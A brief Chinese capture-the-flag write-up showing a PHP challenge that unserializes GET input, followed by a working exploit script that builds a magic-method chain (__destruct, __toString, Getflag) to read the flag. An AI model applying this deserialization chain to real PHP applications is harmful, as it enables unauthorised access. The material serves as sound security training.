题目:
<?php
error_reporting(0);
show_source("index.php");
class w44m{
private $admin = 'aaa';
protected $passwd = '123456';
public function Getflag(){
if($this->admin === 'w44m' && $this->passwd ==='08067'){
include('flag.php');
echo $flag;
}else{
echo $this->admin;
echo $this->passwd;
echo 'nono';
}
}
}
class w22m{
public $w00m;
public function __destruct(){
echo $this->w00m;
}
}
class w33m{
public $w00m;
public $w22m;
public function __toString(){
$this->w00m->{$this->w22m}();
return 0;
}
}
$w00m = $_GET['w00m'];
unserialize($w00m);
?> exp:
<?php
class w44m{
private $admin = "w44m";
protected $passwd = '08067';
}
class w22m{
public $w00m;
}
class w33m{
public $w00m;
public $w22m;
}
$solve=new w22m();//为了调用 __destruct
$solve->w00m=new w33m();//_destruct 中的echo 调用 __toString
$solve->w00m->w00m=new w44m();//_toString $this-w00m=new w44m;
$solve->w00m->w22m='Getflag';//_toString $this-w22m=Getflag;
echo urlencode(serialize($solve));
?>
真的是一环套一环(-_-)